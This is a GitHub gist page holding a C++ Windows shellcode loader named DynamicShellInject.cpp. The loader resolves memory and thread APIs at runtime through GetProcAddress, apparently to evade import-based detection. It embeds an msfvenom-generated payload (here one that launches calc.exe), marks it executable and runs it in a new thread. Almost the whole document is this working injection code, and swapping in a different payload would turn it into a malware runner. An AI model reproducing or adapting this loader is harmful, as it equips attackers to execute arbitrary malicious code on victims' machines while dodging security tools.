Created
October 16, 2023 18:47
-
-
Save trevorsaudi/30a321a013b6ddb1f0263e969ec7ed49 to your computer and use it in GitHub Desktop.
DynamicShellInject.cpp
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| int main(void) { | |
| HMODULE hKernel32 = GetModuleHandle("kernel32.dll"); | |
| HMODULE hNtdll = GetModuleHandle("ntdll.dll"); | |
| DWORD oldprotect; | |
| // Function pointers typedefs | |
| typedef LPVOID (WINAPI *VirtualAlloc_t)( | |
| LPVOID lpAddress, | |
| SIZE_T dwSize, | |
| DWORD flAllocationType, | |
| DWORD flProtect | |
| ); | |
| typedef void (WINAPI *RtlMoveMemory_t)( | |
| LPVOID Destination, | |
| const void* Source, | |
| SIZE_T Length | |
| ); | |
| typedef BOOL (WINAPI *VirtualProtect_t)( | |
| LPVOID lpAddress, | |
| SIZE_T dwSize, | |
| DWORD flNewProtect, | |
| PDWORD lpflOldProtect | |
| ); | |
| typedef HANDLE (WINAPI *CreateThread_t)( | |
| LPSECURITY_ATTRIBUTES lpThreadAttributes, | |
| SIZE_T dwStackSize, | |
| LPTHREAD_START_ROUTINE lpStartAddress, | |
| LPVOID lpParameter, | |
| DWORD dwCreationFlags, | |
| LPDWORD lpThreadId | |
| ); | |
| // Resolve the functions from their modules | |
| VirtualAlloc_t pVirtualAlloc = (VirtualAlloc_t)GetProcAddress(hKernel32, "VirtualAlloc"); | |
| RtlMoveMemory_t pRtlMoveMemory = (RtlMoveMemory_t)GetProcAddress(hNtdll, "RtlMoveMemory"); | |
| VirtualProtect_t pVirtualProtect = (VirtualProtect_t)GetProcAddress(hKernel32, "VirtualProtect"); | |
| CreateThread_t pCreateThread = (CreateThread_t)GetProcAddress(hKernel32, "CreateThread"); | |
| if (!pVirtualAlloc || !pRtlMoveMemory || !pVirtualProtect || !pCreateThread) { | |
| printf("Failed to resolve one or more functions.\n"); | |
| return -1; | |
| } | |
| // msfvenom -p windows/x64/exec CMD=calc.exe -f C | |
| unsigned char payload[] = | |
| "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50" | |
| "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" | |
| "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a" | |
| "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41" | |
| "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52" | |
| "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48" | |
| "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40" | |
| "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" | |
| "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41" | |
| "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1" | |
| "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c" | |
| "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01" | |
| "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" | |
| "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b" | |
| "\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" | |
| "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b" | |
| "\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd" | |
| "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0" | |
| "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff" | |
| "\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"; | |
| unsigned int payload_len = sizeof(payload); | |
| // Allocate memory, copy payload, set permissions, and execute | |
| void* exec_mem = pVirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); | |
| pRtlMoveMemory(exec_mem, payload, payload_len); | |
| BOOL rv = pVirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect); | |
| if (rv != 0) { | |
| HANDLE th = pCreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec_mem, 0, 0, 0); | |
| WaitForSingleObject(th, -1); | |
| } | |
| return 0; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment